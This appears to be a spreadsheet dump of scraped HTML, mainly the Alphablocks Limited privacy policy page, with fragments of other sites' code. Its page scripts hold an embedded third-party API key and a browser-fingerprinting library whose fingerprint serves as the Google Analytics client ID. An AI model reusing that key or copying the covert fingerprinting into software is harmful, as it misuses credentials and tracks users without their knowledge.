--e-global-typography-text-font-weight );}.elementor-widget-icon.elementor-view-stacked .elementor-icon{background-color:var( --e-global-color-primary );}.elementor-widget-icon.elementor-view-framed .elementor-icon, .elementor-widget-icon.elementor-view-default .elementor-icon{color:var( --e-global-color-primary );border-color:var( --e-global-color-primary );}.elementor-widget-icon.elementor-view-framed .elementor-icon, .elementor-widget-icon.elementor-view-default .elementor-icon svg{fill:var( --e-global-color-primary );}.elementor-widget-icon-box.elementor-view-stacked .elementor-icon{background-c</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;!-- Last Published: Wed Apr 12 2023 16:09:09 GMT+0000 (Coordinated Universal Time) --&gt;&lt;html data-wf-domain="www.learningblocks.tv" data-wf-page="62684ef1a49c631a1ef3c012" data-wf-site="5ebbbacd07f0f10257ac30d9" lang="en"&gt;&lt;head&gt;&lt;meta charset="utf-8"/&gt;&lt;title&gt;App Privacy Policy&lt;/title&gt;&lt;meta content="Find out more about Alphablocks and Numberblocks" name="description"/&gt;&lt;meta content="App</t>
  </si>
  <si>
    <t>Privacy Policy" property="og:title"/&gt;&lt;meta content="Find out more about Alphablocks and Numberblocks" property="og:description"/&gt;&lt;meta content="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/6319f2747fd260771bcdd542_Open%20Graph-min%20(1).png" property="og:image"/&gt;&lt;meta content="App Privacy Policy" property="twitter:title"/&gt;&lt;meta content="Find out more about Alphablocks and Numberblocks" property="twitter:description"/&gt;&lt;meta content="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/6319f2747fd260771bcdd542_Open%20Graph-min%20(1).png" property="twitter:image"/&gt;&lt;meta property="og:type" content="website"/&gt;&lt;meta content="summary_large_image" name="twitter:card"/&gt;&lt;meta content="width=device-width, initial-scale=1" name="viewport"/&gt;&lt;link href="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/css/blocks-website.webflow.ce5bd007c.css" rel="stylesheet" type="text/css"/&gt;&lt;link href="https://fonts.googleapis.com" rel="preconnect"/&gt;&lt;link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous"/&gt;&lt;script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;WebFont.load({  google: {    families: ["Ubuntu:300,300italic,400,400italic,500,500italic,700,700italic","Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic","Roboto:300,regular,500,700,900","Nanum Gothic:regular,800:korean,latin","Quicksand:regular,700"]  }});&lt;/script&gt;&lt;!--[if lt IE 9]&gt;&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"&gt;&lt;/script&gt;&lt;![endif]--&gt;&lt;script type="text/javascript"&gt;!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.</t>
  </si>
  <si>
    <t>DocumentTouch&amp;&amp;c instanceof DocumentTouch)&amp;&amp;(n.className+=t+"touch")}(window,document);&lt;/script&gt;&lt;link href="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/6306249e4ca8147ab4ce6cc6_Favicon.png" rel="shortcut icon" type="image/x-icon"/&gt;&lt;link href="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/6306254bdaec4640323d4960_Webclip.png" rel="apple-touch-icon"/&gt;&lt;meta name="p:domain_verify" content="835e270de45b908c93f9078c726b8546"/&gt;
&lt;meta name="facebook-domain-verification" content="gfct2chc7049dqlfzjxh8leiqhhncf" /&gt;
&lt;script&gt;UPLOADCARE_PUBLIC_KEY = 'b088fd72c70b5d997e5c';&lt;/script&gt;
&lt;script src="https://ucarecdn.com/libs/widget/3.x/uploadcare.full.min.js" data-integration="Webflow"&gt;&lt;/script&gt;
&lt;script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script id="mcjs"&gt;!function(c,h,i,m,p){m=c.createElement(h),p=c.getElementsByTagName(h)[0],m.async=1,m.src=i,p.parentNode.insertBefore(m,p)}(document,"script","https://chimpstatic.com/mcjs-connected/js/users/b7a4c12084897feb467dbd5e7/a31a5416de36e8fc21d49cb79.js");&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;div class="section ab wf-section"&gt;&lt;div class="wrapper"&gt;&lt;div class="row pp"&gt;&lt;div class="privacy-logo-wrapper"&gt;&lt;a href="/numberblocks/home" class="pp-logo w-inline-block"&gt;&lt;img src="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b8be4d78764673cf32_NB_logo_BBC_B-min.png" sizes="(max-width: 767px) 23vw, (max-width: 991px) 19vw, 14vw" srcset="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b8be4d78764673cf32_NB_logo_BBC_B-min-p-500.png 500w, https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b8be4d78764673cf32_NB_logo_BBC_B-min.png 700w" alt="Numberblocks BBC B"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="privacy-logo-wrapper"&gt;&lt;a href="/alphablocks/home" class="pp-logo w-inline-block"&gt;&lt;img src="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b724f2ba016193186c_AB_logo_BBC_B-min.png" sizes="(max-width: 767px) 23vw, (max-width: 991px) 19vw, 14vw" srcset="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b724f2ba016193186c_AB_logo_BBC_B-min-p-500.png 500w, https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b724f2ba016193186c_AB_logo_BBC_B-min.png 700w" alt="Alphablocks BBC B"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="privacy-logo-wrapper"&gt;&lt;a href="/alphablocks/home" class="pp-logo w-inline-block"&gt;&lt;img src="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b7d164707a135d7f58_CB_logo_BBC_B-min.png" sizes="(max-width: 767px)</t>
  </si>
  <si>
    <t>23vw, (max-width: 991px) 19vw, 14vw" srcset="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b7d164707a135d7f58_CB_logo_BBC_B-min-p-500.png 500w, https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/630789b7d164707a135d7f58_CB_logo_BBC_B-min.png 700w" alt="Colourblocks BBC B"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="row pp"&gt;&lt;div class="policy-wrapper"&gt;&lt;h2 class="center-text"&gt;&lt;strong&gt;ALPHABLOCKS LIMITED&lt;br/&gt;PRIVACY POLICY&lt;/strong&gt;&lt;br/&gt;&lt;/h2&gt;&lt;h4 class="center-text"&gt;&lt;strong&gt;Last Updated: June 2020&lt;/strong&gt;&lt;/h4&gt;&lt;div class="w-richtext"&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;1. &lt;strong&gt;INTRODUCTION AND GENERAL TERMS&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;This privacy policy sets out how we use data relating to you that you provide to us, or that we may collect, through our website &lt;a href="/"&gt;www.alphablocks.tv&lt;/a&gt; (the “&lt;strong&gt;Website&lt;/strong&gt;”) or our “Alphablocks” experience (“App”).&lt;strong&gt;  &lt;/strong&gt;The Website and App is&lt;strong&gt; &lt;/strong&gt;owned and operated by Alphablocks Limited, a company registered in England and Wales under company number 07467129 and with our registered office at Acre House, 11/15 William Road, London, NW1 3ER (“&lt;strong&gt;Alphablocks&lt;/strong&gt;”,&lt;strong&gt; &lt;/strong&gt;“&lt;strong&gt;we&lt;/strong&gt;”, “&lt;strong&gt;us&lt;/strong&gt;” or “&lt;strong&gt;our&lt;/strong&gt;”).&lt;/p&gt;&lt;/div&gt;&lt;div class="grid-block padding"&gt;&lt;p class="no-bottom-margins"&gt;If you have any questions or comments about this Privacy Policy please contact us on &lt;a href="mailto:</t>
  </si>
  <si>
    <t>info@alphablocks.tv"&gt;info@alphablocks.tv&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="w-richtext"&gt;&lt;p&gt;‍&lt;/p&gt;&lt;p&gt;We are committed to protecting and respecting your privacy. This policy explains what personal information we collect from you and how that information will be processed. Where we decide the purpose or means for which personal data you supply through these online services is processed, we are the “data controller.”</t>
  </si>
  <si>
    <t>We will comply with all applicable data protection laws, including the General Data Protection Regulation 2016/679.&lt;/p&gt;&lt;p&gt; This policy explains the following:&lt;/p&gt;&lt;ul role="list"&gt;&lt;li&gt;What information we may collect about you&lt;/li&gt;&lt;li&gt;How we will use information we collect about you&lt;/li&gt;&lt;li&gt;Whether we will disclose your details to anyone else&lt;/li&gt;&lt;li&gt;Your choices and rights regarding the personal information you have provided to us.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;The Website may contain hyperlinks to websites owned and operated by third parties.   They will govern the use of personal information you submit or which is collected by cookies whilst visiting these websites.</t>
  </si>
  <si>
    <t>We do not accept any responsibility or liability for the privacy practices of such third party websites and your use of them is at your own risk.&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;2. INFORMATION WE MAY COLLECT ABOUT YOU&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;We collect and process the following information which may include your personal data.&lt;/p&gt;&lt;/div&gt;&lt;div class="grid-block padding margin-bottom"&gt;&lt;div class="w-richtext"&gt;&lt;h4&gt;‍&lt;strong&gt;(“Submitted Information”)&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;You may give us information about you by filling in forms when using our services, as well as when creating your account during the registration process. &lt;/p&gt;&lt;p</t>
  </si>
  <si>
    <t>&gt;This can include:&lt;/p&gt;&lt;ul role="list"&gt;&lt;li&gt;your name;&lt;/li&gt;&lt;li&gt;your username;&lt;/li&gt;&lt;li&gt;your e-mail address;&lt;/li&gt;&lt;li&gt;your password; and&lt;/li&gt;&lt;li&gt;your telephone number.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;We may also obtain sensitive personal data about you if you voluntarily supply it through the Website and/or App.   For example, when you communicate with us via the contact page on the Website.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="grid-block padding margin-bottom"&gt;&lt;div class="w-richtext"&gt;&lt;h4&gt;&lt;strong&gt;Your Browsing Activities&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;In relation to your activity on our online services, we may collect information relating to the web address that you arrive from or click through to, pages viewed, page response times, download errors, the length of time you spend on certain pages, page interaction information such as scrolling, clicks, and methods used to browse away from our Website.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="grid-block padding margin-bottom"&gt;&lt;div class="w-richtext"&gt;&lt;h4&gt;&lt;strong&gt;How you use our Website/App (“Analytics”)&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;We may collect technical information about your computer and/or device that may identify you, including your IP address, operating system, browser type, time-zone and browser plug-in details through third party analytics providers.   These third party analytics providers may collect analytics on our behalf and in accordance with our instructions, and their applicable privacy notice.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="grid-block padding margin-bottom"&gt;&lt;div class="w-richtext"&gt;&lt;h4&gt;&lt;strong&gt;Information about you collected from Third Parties (“Content Information”)&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;We may collect information about you from third party service providers (like social media companies, marketing partners or public databases) to use along with the information that we collect from you.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;Other companies may set their own cookies or similar technologies when you visit the Website and/or App. This includes third parties that we have engaged to provide services on our behalf (like website analytics), as well as third parties that deliver content (like videos from YouTube).&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="w-richtext"&gt;&lt;h4&gt;&lt;strong&gt;3. WHY WE COLLECT INFORMATION ABOUT YOU&lt;/strong&gt;&lt;/h4&gt;&lt;/div&gt;&lt;div class="grid-block padding margin-bottom"&gt;&lt;div class="w-richtext"&gt;&lt;h4&gt;&lt;strong&gt;To provide the Website/App&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;We will use information about you for providing the website and/or App and delivering our services to you.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="grid-block padding margin-bottom"&gt;&lt;div class="w-richtext"&gt;&lt;h4&gt;&lt;strong&gt;To Understand how our Website/App is used&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;We process information to understand how visitors use our Website and/or use our App.</t>
  </si>
  <si>
    <t>This processing is necessary for us to pursue our legitimate interest of (i) ensuring that our Website functions properly so that you and other users have the best experience when using it, and (ii) improving the quality of our Website and providing a better experience to our users.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="w-richtext"&gt;&lt;h4&gt;&lt;strong&gt;4. DATA SHARING&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;We will share your information with third parties only in the ways that are described in this privacy policy.   If you would like to find out more about how the third parties listed in this policy use your information, this should be set out in their respective privacy policies.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;Personnel, Suppliers or Subcontractors: We keep your information confidential, but may disclose it to our personnel, suppliers or subcontractors insofar as it is reasonably necessary for the purposes set out in this privacy policy. However, this is on the basis that they do not make independent use of the information, and have agreed to safeguard this information.&lt;/p&gt;&lt;p&gt;Required by law: In addition, we may disclose your information to the extent that we are required to do so by law (which may include to government bodies and law enforcement agencies); in connection with any legal proceedings or prospective legal proceedings; and in order to establish, exercise or defend our legal rights (including providing information to others for the purposes of fraud prevention).&lt;/p&gt;&lt;p&gt;Merger or acquisition&lt;em&gt;:  &lt;/em&gt;If we are involved in a merger, acquisition, or sale of all or a portion of its assets, you will be notified via email, account message and/or a prominent notice on our website of any change in ownership or uses of this information, as well as any choices you may have regarding this information.&lt;/p&gt;&lt;p&gt;Enforcement:   We may also disclosure your personal information to third parties in order to enforce or apply the terms of agreements, to investigate potential breaches, or to protect our rights, property or safety or those of our customers or others.&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;5.</t>
  </si>
  <si>
    <t>YOUR RIGHTS IN RELATION TO PERSONAL DATA WHICH WE PROCESS RELATING TO YOU&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;You have the right to access, modify, rectify and delete any data that concerns you over the way we process personal data relating to you.   We aim to comply without undue delay, and within one month at the latest.&lt;/p&gt;&lt;p&gt;To make a request, please let us know via the Website.&lt;/p&gt;&lt;p&gt; If you do provide us with personal information we generally retain it for as long as your account on the Website and/or App is active, or as is otherwise necessary for us to provide the Website and/or App to you, or as otherwise described in this privacy policy.&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;6.</t>
  </si>
  <si>
    <t>CHILDREN&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;You should be at least 16 to register an account on our Website and/or App.   We do not use the Website and/or App to knowingly solicit data from or market to children under the age of 16.   If a parent or guardian becomes aware that his or her child has provided us with information without their consent, he or she should contact us via the contact details detailed at the top of this privacy policy.</t>
  </si>
  <si>
    <t>We will delete such information from our files within a reasonable time.&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;7. SECURITY&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;We will take reasonable physical, technical and organisational precautions to protect your personal information from unauthorised access, use or disclosure.   For example, we use computer systems with limited access in controlled facilities to store personal info.</t>
  </si>
  <si>
    <t xml:space="preserve">We also use technologies like encryption and hashing to protect some of the info we collect.&lt;/p&gt;&lt;p&gt;Please be aware that, although we endeavour to provide reasonable security for information we process and maintain, no security system can prevent all potential security breaches. By choosing to share your personal information with us you agree and accept that you do so at your own risk.&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;8. INTERNATIONAL DATA TRANSFERS&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;Where we transfer your data outside of the EEA, we have agreements in place with those parties which include standard data protection clauses adopted by a data protection regulator and approved by the European Commission to ensure that appropriate safeguards are in place to protect your personal data.  </t>
  </si>
  <si>
    <t>If you would like to find out more about these safeguards, please let us know by writing to us through the Support Services.&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;9. COOKIES&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;A cookie is a text file placed onto your device when you access the Website. We use cookies and other online tracking devices such as web beacons, and flash object storage to deliver, improve and monitor the Website, including in the following ways:&lt;/p&gt;&lt;/div&gt;&lt;div class="w-layout-grid grid-3"&gt;&lt;div class="grid-block"&gt;&lt;h4&gt;&lt;strong&gt;Authentication&lt;/strong&gt;&lt;/h4&gt;&lt;/div&gt;&lt;div class="grid-block"&gt;&lt;p&gt;To log you into your account on the Website and keep you logged in.&lt;/p&gt;&lt;/div&gt;&lt;div class="grid-block"&gt;&lt;h4&gt;&lt;strong&gt;Preferences&lt;/strong&gt;&lt;/h4&gt;&lt;/div&gt;&lt;div class="grid-block"&gt;&lt;p&gt;To remember information about you such as your preferred language and configuration.&lt;/p&gt;&lt;/div&gt;&lt;div class="grid-block"&gt;&lt;h4&gt;&lt;strong&gt;Analytics&lt;/strong&gt;&lt;/h4&gt;&lt;/div&gt;&lt;div class="grid-block"&gt;&lt;p&gt;To help us understand how you use the Website, and how often, so we can improve it to deliver a better experience for our users.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="w-richtext"&gt;&lt;p&gt;‍&lt;/p&gt;&lt;p&gt;The information we obtain from our use of cookies will not usually contain your personal data.</t>
  </si>
  <si>
    <t xml:space="preserve">Although we may obtain information about your device such as your IP address, your browser and/or other internet log information, this will not usually identify you personally.&lt;/p&gt;&lt;p&gt;Please note that if you choose to disable cookies, or similar technologies, on your device you may be unable to make full use of the Website.&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;10. VARIATION&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt; We may make chances to this policy from time to time, and such changes will be posted on this page.  </t>
  </si>
  <si>
    <t>You should check this page from time to time to ensure that you are aware of any changes.   Where appropriate we may notify you of any changes by email.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="policy-wrapper"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="footer-header"&gt;&lt;img src="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/5ebc281fc5e12788cb7cfd3c_mobilr-footer-header.png" sizes="100vw" srcset="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/5ebc281fc5e12788cb7cfd3c_mobilr-footer-header-p-500.png 500w, https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/5ebc281fc5e12788cb7cfd3c_mobilr-footer-header-p-800.png 800w, https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/5ebc281fc5e12788cb7cfd3c_mobilr-footer-header-p-1080.png 1080w, https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/5ebc281fc5e12788cb7cfd3c_mobilr-footer-header.png 1904w" alt="Footer image" class="lp-footer-2"/&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="section afterfooter wf-section"&gt;&lt;div class="wrapper"&gt;&lt;div class="after-footer-wrapper"&gt;&lt;p class="paragraph-small footer"&gt;© 2022 Alphablocks Ltd. All Rights Reserved.</t>
  </si>
  <si>
    <t>&lt;a href="/cookie-policy"&gt;Cookie Policy&lt;/a&gt; • &lt;a href="/privacy-policy"&gt;Privacy Policy&lt;/a&gt; • &lt;a href="/terms-and-conditions"&gt;Terms and Conditions &lt;/a&gt;• &lt;a href="/acceptable-use-policy"&gt;Acceptable Use Policy&lt;/a&gt; • &lt;a href="/terms-of-service"&gt;Terms of Service&lt;/a&gt;&lt;/p&gt;&lt;p class="paragraph-small footer ds"&gt;Website by &lt;a href="https://linktr.ee/daveseadon" target="_blank"&gt;Dave Seadon&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=5ebbbacd07f0f10257ac30d9" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"&gt;&lt;/script&gt;&lt;script src="https://uploads-ssl.webflow.com/5ebbbacd07f0f10257ac30d9/js/webflow.6906f7642.js" type="text/javascript"&gt;&lt;/script&gt;&lt;!--[if lte IE 9]&gt;&lt;script src="//cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"&gt;&lt;/script&gt;&lt;![endif]--&gt;&lt;script&gt;
  $( document ).ready(function() {
    $.getJSON("https://api.ipbase.com/v2/info?&amp;apikey=hVe4BIJRFVdYohO96SpwZ1EKYpLEUKrfloqw68VP", function (response) {
    var country = response.data.location.country.alpha2;
      console.log (response);
    if(country == 'GB') {
    document.getElementById('INGB').style.display = "inline-block"
    } else {
    	document.getElementById('OUTGB').style.display = "block"
    }; 
}, "jsonp");
});
&lt;/script&gt;
&lt;script&gt;
  /*
(function(g,e,o,t,a,r,ge,tl,y){
s=function(){var def='geotargetlygeocontent1638190161494_default',len=g.getElementsByClassName(def).length;
if(len&gt;0){for(i=0;i&lt;len;i++){g.getElementsByClassName(def)[i].style.display='inline';}}};
t=g.getElementsByTagName(e)[0];y=g.createElement(e);
y.async=true;y.src='https://g1584674682.co/gc?refurl='+g.referrer+'&amp;id=-MpfjWrPoyxpLNxv-8KJ&amp;winurl='+encodeURIComponent(window.location);
t.parentNode.insertBefore(y,t);y.onerror=function(){s()};
})(document,'script');
*/
&lt;/script&gt;
&lt;noscript&gt;&lt;style&gt;.geotargetlygeocontent1638190161494_default{display:inline !important}&lt;/style&gt;&lt;/noscript&gt;
&lt;script&gt;
(function(a,c,b){if(typeof module!=="undefined"&amp;&amp;module.exports){module.exports=b()}else{if(typeof define==="function"&amp;&amp;define.amd){define(b)}else{c[a]=b()}}})("Fingerprint",this,function(){var a=function(b){var c,d;c=Array.prototype.forEach;d=Array.prototype.map;this.each=function(k,j,h){if(k===null){return}if(c&amp;&amp;k.forEach===c){k.forEach(j,h)}else{if(k.length===+k.length){for(var g=0,e=k.length;g&lt;e;g++){if(j.call(h,k[g],g,k)==={}){return}}}else{for(var f in k){if(k.hasOwnProperty(f)){if(j.call(h,k[f],f,k)==={}){return}}}}}};this.map=function(h,g,f){var e=[];if(h==null){return e}if(d&amp;&amp;h.map===d){return h.map(g,f)}this.each(h,function(k,i,j){e[e.length]=g.call(f,k,i,j)});return e};if(typeof b=="object"){this.hasher=b.hasher;this.screen_resolution=b.screen_resolution;this.screen_orientation=b.screen_orientation;this.canvas=b.canvas;this.ie_activex=b.ie_activex}else{if(typeof b=="function"){this.hasher=b}}};a.prototype={get:function(){var c=[];c.push(navigator.userAgent);c.push(navigator.language);c.push(screen.colorDepth);if(this.screen_resolution){var b=this.getScreenResolution();if(typeof b!=="undefined"){c.push(b.join("x"))}}c.push(new Date().getTimezoneOffset());c.push(this.hasSessionStorage());c.push(this.hasLocalStorage());c.push(this.hasIndexDb());if(document.body){c.push(typeof(document.body.addBehavior))}else{c.push(typeof undefined)}c.push(typeof(window.openDatabase));c.push(navigator.cpuClass);c.push(navigator.platform);c.push(navigator.doNotTrack);c.push(this.getPluginsString());if(this.canvas&amp;&amp;this.isCanvasSupported()){c.push(this.getCanvasFingerprint())}if(this.hasher){return</t>
  </si>
  <si>
    <t>this.hasher(c.join("###"),31)}else{return this.murmurhash3_32_gc(c.join("###"),31)}},murmurhash3_32_gc:function(j,f){var k,l,h,b,e,c,g,d;k=j.length&amp;3;l=j.length-k;h=f;e=3432918353;c=461845907;d=0;while(d&lt;l){g=((j.charCodeAt(d)&amp;255))|((j.charCodeAt(++d)&amp;255)&lt;&lt;8)|((j.charCodeAt(++d)&amp;255)&lt;&lt;16)|((j.charCodeAt(++d)&amp;255)&lt;&lt;24);++d;g=((((g&amp;65535)*e)+((((g&gt;&gt;&gt;16)*e)&amp;65535)&lt;&lt;16)))&amp;4294967295;g=(g&lt;&lt;15)|(g&gt;&gt;&gt;17);g=((((g&amp;65535)*c)+((((g&gt;&gt;&gt;16)*c)&amp;65535)&lt;&lt;16)))&amp;4294967295;h^=g;h=(h&lt;&lt;13)|(h&gt;&gt;&gt;19);b=((((h&amp;65535)*5)+((((h&gt;&gt;&gt;16)*5)&amp;65535)&lt;&lt;16)))&amp;4294967295;h=(((b&amp;65535)+27492)+((((b&gt;&gt;&gt;16)+58964)&amp;65535)&lt;&lt;16))}g=0;switch(k){case 3:g^=(j.charCodeAt(d+2)&amp;255)&lt;&lt;16;case 2:g^=(j.charCodeAt(d+1)&amp;255)&lt;&lt;8;case 1:g^=(j.charCodeAt(d)&amp;255);g=(((g&amp;65535)*e)+((((g&gt;&gt;&gt;16)*e)&amp;65535)&lt;&lt;16))&amp;4294967295;g=(g&lt;&lt;15)|(g&gt;&gt;&gt;17);g=(((g&amp;65535)*c)+((((g&gt;&gt;&gt;16)*c)&amp;65535)&lt;&lt;16))&amp;4294967295;h^=g}h^=j.length;h^=h&gt;&gt;&gt;16;h=(((h&amp;65535)*2246822507)+((((h&gt;&gt;&gt;16)*2246822507)&amp;65535)&lt;&lt;16))&amp;4294967295;h^=h&gt;&gt;&gt;13;h=((((h&amp;65535)*3266489909)+((((h&gt;&gt;&gt;16)*3266489909)&amp;65535)&lt;&lt;16)))&amp;4294967295;h^=h&gt;&gt;&gt;16;return h&gt;&gt;&gt;0},hasLocalStorage:function(){try{return !! window.localStorage}catch(b){return true}},hasSessionStorage:function(){try{return !!window.sessionStorage}catch(b){return</t>
  </si>
  <si>
    <t>true}},hasIndexDb:function(){try{return !!window.indexedDB}catch(b){return true}},isCanvasSupported:function(){var b=document.createElement("canvas");return !! (b.getContext&amp;&amp;b.getContext("2d"))},isIE:function(){if(navigator.appName==="Microsoft Internet Explorer"){return true}else{if(navigator.appName==="Netscape"&amp;&amp;/Trident/.test(navigator.userAgent)){return true}}return false},getPluginsString:function(){if(this.isIE()&amp;&amp;this.ie_activex){return this.getIEPluginsString()}else{return this.getRegularPluginsString()}},getRegularPluginsString:function(){return this.map(navigator.plugins,function(c){var b=this.map(c,function(d){return[d.type,d.suffixes].join("~")}).join(",");return[c.name,c.description,b].join("::")},this).join(";")},getIEPluginsString:function(){if(window.</t>
  </si>
  <si>
    <t>ActiveXObject){var b=["ShockwaveFlash. ShockwaveFlash","AcroPDF.PDF","PDF.PdfCtrl","QuickTime. QuickTime","rmocx.</t>
  </si>
  <si>
    <t>RealPlayer G2 Control","rmocx. RealPlayer G2 Control.1","RealPlayer. RealPlayer(tm)</t>
  </si>
  <si>
    <t>ActiveX Control (32-bit)","RealVideo.RealVideo(tm) ActiveX</t>
  </si>
  <si>
    <t>Control (32-bit)","RealPlayer","SWCtl.SWCtl","WMPlayer. OCX","AgControl. AgControl","Skype.</t>
  </si>
  <si>
    <t>Detection"];return this.map(b,function(c){try{new ActiveXObject(c);return c}catch(d){return null}}).join(";")}else{return""}},getScreenResolution:function(){var b;if(this.screen_orientation){b=(screen.height&gt;screen.width)?[screen.height,screen.width]:[screen.width,screen.height]}else{b=[screen.height,screen.width]}return b},getCanvasFingerprint:function(){var d=document.createElement("canvas");var c=d.getContext("2d");var b="http://valve.github.io";c.textBaseline="top";c.font="14px 'Arial'";c.textBaseline="alphabetic";c.fillStyle="#f60";c.fillRect(125,1,62,20);c.fillStyle="#069";c.fillText(b,2,15);c.fillStyle="rgba(102, 204, 0, 0.7)";c.fillText(b,4,17);return d.toDataURL()}};return a});&lt;/script&gt;
&lt;script&gt;
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-167171289-1', {
    'storage': 'none',
    'clientId': new Fingerprint().get()
  });
  ga('set', 'anonymizeIp', true);
  ga('send', 'pageview');
&lt;/script&gt;
&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html lang="en"&gt;_x005F_x000D_
&lt;head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"&gt;_x005F_x000D_
&lt;!-- Google tag (gtag.js) --&gt;_x005F_x000D_
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=G-3J1BLD838B"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
  window.dataLayer = window.dataLayer || [];_x005F_x000D_
  function gtag(){dataLayer.push(arguments);}_x005F_x000D_
  gtag('js', new Date());_x005F_x000D_
  gtag('config', 'G-3J1BLD838B');_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
&lt;meta charset="utf-8" /&gt;_x005F_x000D_
_x005F_x000D_
&lt;title&gt;Guitar Chord Finder &amp;amp; Analyzer as an App  | Oolimo.com&lt;/title&gt;_x005F_x000D_
&lt;meta name="keywords" content="app, android, ios, iphone, ipad, handy, mobile, phone, guitar, chords, chord namer, chord finder, name guitar chords, guitar chord app" /&gt;_x005F_x000D_
